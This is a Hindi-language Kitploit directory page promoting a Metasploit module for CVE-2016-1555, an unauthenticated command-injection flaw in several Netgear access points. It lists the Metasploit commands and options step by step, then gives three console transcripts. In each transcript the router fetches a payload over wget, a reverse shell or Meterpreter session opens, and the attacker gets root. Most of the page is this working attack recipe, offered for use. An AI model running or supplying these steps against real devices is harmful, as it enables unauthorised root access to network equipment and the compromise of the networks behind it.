Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2016-1555 — मेटास्प्लॉइट मॉड्यूल जो कई नेटगियर राउटर मॉडलों में बिना प्रमाणीकरण के कमांड इंजेक्शन का शोषण करके रूट विशेषाधिकारों के साथ रिमोट कोड निष्पादन प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/ide0x90/cve-2016-1555
एम्बेडेड सिस्टम सुरक्षाशोषण फ्रेमवर्कIoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubide0x90/cve-2016-1555

cve-2016-1555

मेटास्प्लॉइट मॉड्यूल जो कई नेटगियर राउटर मॉडलों में बिना प्रमाणीकरण के कमांड इंजेक्शन का शोषण करके रूट विशेषाधिकारों के साथ रिमोट कोड निष्पादन प्राप्त करता है।

रिपॉजिटरी देखें
227 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विवरण

यह मॉड्यूल Netgear WN604 (3.3.3 से पहले) और WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, तथा WNDAP660 (3.5.5.0 से पहले) में एक अनअधिकृत मनमाना कमांड निष्पादन भेद्यता का उपयोग करता है। यह भेद्यता राउटर द्वारा POST अनुरोधों को संभालने के तरीके में उत्पन्न होती है, जो (1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, और (5) boardDataWW.php से आते हैं। इस भेद्यता की खोज Daming Dominic Chen ने की, जो FIRMADYNE (https://github.com/firmadyne/firmadyne) के निर्माता हैं।

कमजोर अनुप्रयोग

  1. msfconsole प्रारंभ करें
  2. use exploit/linux/http/netgear_unauth_exec करें
  3. set RHOST [राउटर का IP] सेट करें
  4. अगर आपका पेलोड किसी अन्य सिस्टम पर होस्ट नहीं है तो set SRVHOST [आपके सर्वर का IP] सेट करें
  5. set LHOST [आपका IP] सेट करें
  6. अगर आप एक विशिष्ट MAC पता चाहते हैं (बेतरतीब के बजाय) तो set MAC_ADDRESS [12 अंकों की संख्या] सेट करें
  7. अगर आप डिफ़ॉल्ट boardDataWW.php के बजाय किसी अन्य URI को लक्षित करना चाहते हैं तो set TARGETURI [लक्ष्य URI] सेट करें
  8. अगर आप मीटरप्रेटर सत्र चाहते हैं तो set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp सेट करें
  9. exploit करें
  10. यदि राउटर कमजोर है, तो पेलोड wget (डिफ़ॉल्ट HTTP स्टेजर) के माध्यम से डाउनलोड होकर निष्पादित होना चाहिए, और आपको एक सत्र प्राप्त होना चाहिए

डिफ़ॉल्ट पेलोड (linux/mipsbe/shell_reverse_tcp) के साथ उदाहरण

root@kitploit:~
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/Ekvrz8LbW
[*] Client 192.168.200.100 (Wget) requested /Ekvrz8LbW
[*] Sending payload to 192.168.200.100 (Wget)
[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56852) at 2018-10-09 20:24:56 +0630
[*] Command Stager progress - 118.97% done (138/116 bytes)
[*] Server stopped.

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
id
uid=0(root) gid=0(root)

मीटरप्रेटर (linux/mipsbe/meterpreter/reverse_tcp) के साथ उदाहरण

root@kitploit:~
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/x6ZYzUoe9x7IR
[*] Client 192.168.200.100 (Wget) requested /x6ZYzUoe9x7IR
[*] Sending payload to 192.168.200.100 (Wget)
[*] Sending stage (1108408 bytes) to 192.168.200.100
[*] Meterpreter session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56854) at 2018-10-09 20:26:39 +0630
[*] Command Stager progress - 118.33% done (142/120 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.200.100
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 

किसी अन्य कमजोर URI (boardDataNA.php) का उपयोग करके उदाहरण

root@kitploit:~
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set TARGETURI boardDataNA.php
TARGETURI => boardDataNA.php
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/zlJyAS8F1As
[*] Client 192.168.200.100 (Wget) requested /zlJyAS8F1As
[*] Sending payload to 192.168.200.100 (Wget)
[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56856) at 2018-10-09 20:28:41 +0630
[*] Command Stager progress - 118.64% done (140/118 bytes)
[*] Server stopped.

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
id
uid=0(root) gid=0(root)
टूल डाउनलोड करें